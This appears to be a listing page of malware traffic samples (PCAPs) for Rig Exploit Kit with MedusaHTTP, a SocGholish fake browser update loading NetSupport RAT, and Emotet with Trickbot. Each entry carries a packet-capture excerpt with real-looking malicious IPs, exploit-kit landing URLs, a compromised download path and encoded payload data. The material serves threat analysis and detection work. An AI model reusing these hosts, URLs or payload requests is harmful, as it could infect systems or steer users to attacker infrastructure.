Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1 E….H@….. ..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: 188.225.37.115 Connection: Keep-Alive 2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0 E..(.a….^…%s ..e.P……..U.P…. .. 2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK E..$.b….Y…%s ..e.P……..U.P…cL..HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Mon, 12 Aug 2019 20:57:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: […]

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37) E..A.O…… ..e …._.5.-……………mysocalledchaos.com….. 2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1 E….d@….. ..e.>o@…P.9…C.&P…….GET / HTTP/1.1 Host: mysocalledchaos.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en 2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP E…….1.[S…. ..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a340349fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd 2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0 E..(..@…[. ..e…..>.Pn.?x..].P…………. 2019-08-26 15:03:39.168023 […]

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1 E..?..@…Y1 .e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: thinhvuongmedia.com DNT: 1 Connection: Keep-Alive 2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK E..$T…..A.|… .e.P…y.e….P…….HTTP/1.1 200 OK Date: Wed, 18 Sep 2019 17:26:02 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33 X-Powered-By: PHP/5.6.33 Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache […]